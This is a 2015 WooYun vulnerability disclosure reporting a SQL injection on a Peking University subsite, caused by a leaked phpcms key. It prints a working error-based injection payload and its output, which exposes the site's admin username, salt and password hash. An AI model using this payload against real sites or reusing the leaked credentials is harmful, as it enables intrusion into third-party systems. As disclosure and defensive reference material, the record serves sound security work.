北京大学某分站sql注射漏洞 | wooyun-2015-0125058

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0125058

漏洞标题：

北京大学某分站sql注射漏洞

漏洞详情

披露状态：

2015-07-07：细节已通知厂商并且等待厂商处理中
2015-07-08：厂商已经确认，细节仅向厂商公开
2015-07-18：细节向核心白帽子及相关领域专家公开
2015-07-28：细节向普通白帽子公开
2015-08-07：细节向实习白帽子公开
2015-08-22：细节向公众公开

简要描述：

北京大学某分站sql注射漏洞

详细说明：

北京大学某分站sql注射漏洞
漏洞网站：http://www.isd.pku.edu.cn
形成原因：phpcms key泄露

MySQL Query : SELECT * FROM `Peking`.`v9_member` WHERE `phpssouid` = '' and (select 1 from (select count(*),concat((select concat(user(),0x7c,encrypt,0x7c,password,0x7c,username) FROM v9_admin where userid=1),floor(rand(0)*2))x from information_schema.tables group by x)a);#' LIMIT 1
MySQL Error : Duplicate entry 'newisd@localhost|7XhRG3|50429d3b0a2f65c48cf9181f32b00d1f|haocaow' for key 'group_key'
MySQL Errno : 1062
Message : Duplicate entry 'newisd@localhost|7XhRG3|50429d3b0a2f65c48cf9181f32b00d1f|haocaow' for key 'group_key'
Need Help?

漏洞证明：

修复方案：

用开源cms就要及时打补丁啊。

版权声明：转载请注明来源路人甲天下第一关@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-07-08 08:06

厂商回复：

通知处理中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲天下第一关@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲天下第一关@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲天下第一关@乌云